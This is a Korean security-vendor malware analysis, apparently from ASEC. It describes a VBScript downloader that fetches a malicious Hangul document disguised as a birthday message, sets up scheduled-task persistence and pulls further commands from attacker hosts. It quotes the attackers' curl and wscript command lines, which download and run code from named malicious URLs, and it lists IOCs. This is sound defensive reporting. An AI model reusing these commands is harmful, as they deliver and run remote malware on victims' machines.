생일 축하 내용으로 위장한 악성 한글 문서 (OLE 개체)

ASEC 분석팀은 최근 악성 한글 파일을 다운로드 하는 VBScript를 확인하였다. 해당 악성코드의 정확한 유포경로는 확인되지 않았지만 VBScript는 curl을 통해 다운로드 된다.

현재 확인된 명령어는 다음과 같다.

  • curl  -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp
  • cmd /c cd > %appdata%\\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\\vbtemp

두 명령어 모두 %APPDATA% 폴더에 vbtemp 명으로 스크립트를 저장한다. hxxp://datkka.atwebpages[.]com/2vbs 에는 아래 그림과 같이 작업 스케줄러 등록 및 추가 파일 다운로드 등의 기능을 수행하는 VBScript 코드가 존재한다.

그림 1. hxxp://datkka.atwebpages[.]com/2vbs 에서 확인되는 스크립트

다운로드 된 vbtemp 파일은 wscript  //e:vbscript //b %APPDATA%\vbtemp 명령을 통해 실행된다. 스크립트가 정상적으로 실행되기 위해서는 %APPDATA% 폴더에 tmp~pth 파일이 존재해야 한다. 현재 tmp~pth 파일은 확인되지 않았지만 APPDATA 폴더의 경로가 저장되어 있을 것으로 추정된다.

vbtemp 파일 실행 시 curl 명령어를 통해 한글 파일(.hwp)을 다운로드 하고 %APPDATA%\tmp~pth 파일에 저장된 경로를 참조하여 해당 경로에 1.hwp 명으로 저장 및 실행한다. 이때 실행되는 명령어는 다음과 같다.

cmd /c  curl -H “User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) hrome/53.0.3027.64 Safari/537.32” hxxps://bigfile.mail.naver[.]com/download?fid=adR0Wz+5+BKjK3YXKoF0KxuXKAElKxujKogZKog/KoUwKAUdFAujKxMrKqbXKoKla3YlFxUmaxUmF4J4pztrpAUqMxM/K6FCK4M9KqpvpovwMm== -o [\tmp~pth에 저장된 경로]\ 1.hwp && [\tmp~pth에 저장된 경로]\1.hwp
vbtemp에서 실행되는 명령어-1

이후 위와 동일하게 curl 명령어를 사용하여 추가 스크립트를 다운로드 한다. 다운로드 된 스크립트는 %APPDATA%\Microsoft\Windows\Themes\TransWallpaper 로 저장된다. 또한, 앞서 다운로드 한 1.hwp 파일을 다시 한 번 실행한다.

cmd /c curl -H “User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/53.0.3027.64 Safari/537.32” hxxp://datkka.atwebpages[.]com/mal -o  %APPDATA%\Microsoft\Windows\Themes\TransWallpaper && [\tmp~pth에 저장된 경로]\1.hwp
vbtemp에서 실행되는 명령어-2
그림 2. hxxp://datkka.atwebpages[.]com/mal에서 확인되는 스크립트

생성된 TransWallpaper 파일은 작업 스케줄러 등록을 통해 30분 마다 스크립트가 자동 실행 될 수 있도록 한다.

그림 3. 생성된 작업 스케줄러

해당 스크립트 파일은 hxxp://datkka.atwebpages[.]com/down.php에서 추가 명령어를 받아 실행한다. 현재는 “아래”cmd /c calc” 명령어가 수신되지만, 공격자에 의해 명령어 수정이 가능하며 이 경우 다양한 악성 행위가 발현될 수 있다.

그림 4. hxxp://datkka.atwebpages[.]com/down.php의 응답

앞서 1.hwp 로 저장한 한글 파일은 실행 시 %temp% 폴더에 HappyBirthday.vbs를 생성한다.

한글 파일 내부에는 상대 경로로 작성된 링크가 존재한다. 사용자가 링크를 클릭하면 ..\AppData\Local\Temp\HappyBirthday (2).vbs 파일이 실행된다. 이때 실행하는 파일명이 HappyBirthday (2).vbs인 이유는 vbtemp 스크립트 실행 시 1.hwp 파일을 두 번 실행하기 때문으로 보여진다. 단순히 사용자가 한글 파일을 클릭하여 실행할 경우 드롭되는 HappyBirthday.vbs의 파일명이 일치하지 않아 악성행위가 수행되지 않는다.

그림5. 한글 파일 본문
그림 6. 한글 파일 문서 정보

[그림 6]과 같이 한글 문서의 지은이는 국내 ‘한반도 평화교육 플랫폼’으로 확인되며 북한과 관련된 인물을 타겟하여 제작된 것으로 추정된다.

한글 파일에 의해 드롭 및 실행되는 HappyBirthday.vbs 는 hxxps://driver.googledocs.cloudns[.]nz/Yb/yb에 접속하여 추가 스크립트를 다운로드한 후 %appdata%\tmp~1 로 저장 및 실행한다.

curl -k -H “”User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36″” hxxps://driver.googledocs.cloudns[.]nz/Yb/yb -o %appdata%\tmp~1 & wscript.exe //e:vbscript //b %appdata%\tmp~1
HappyBirthday.vbs 실행 명령어

현재 hxxps://driver.googledocs.cloudns[.]nz/Yb/yb 에 접속이 불가하여 이후 행위는 확인이 불가하지만 공격자의 의도에 따라 다양한 악성 명령어가 실행될 수 있다.

악성코드의 정확한 유포 경로가 확인되지 않았지만 다양한 파일을 이용하고 있는 만큼 사용자의 주의가 필요하다. 출처가 불분명한 파일의 실행을 자제하고 사용하는 응용 프로그램 및 V3를 최신 버전으로 업데이트하여 사용해야한다.

[파일 진단]
Downloader/VBS.Agent
Dropper/HWP.Generic

[IOC]
7c38b40ec19609f32de2a70d409c38b0 (vbs)
60d117f5cb7b0f8133967ec535c85c6a (vbs)
d86d57c1d8670d510e7b7a1ad7db9fd2 (vbs)
6083a1af637d9dd2b2a16538a17e1f45 (hwp)
ca2917006eb29171c9e5f374e789f53a (vbs)
hxxp://datkka.atwebpages.com/2vbs
hxxp://datarium.epizy.com/2vbs
hxxp://datkka.atwebpages.com/mal
hxxp://datkka.atwebpages.com/down.php
hxxps://driver.googledocs.cloudns[.]nz/Yb/yb

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:,

0 0 votes
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments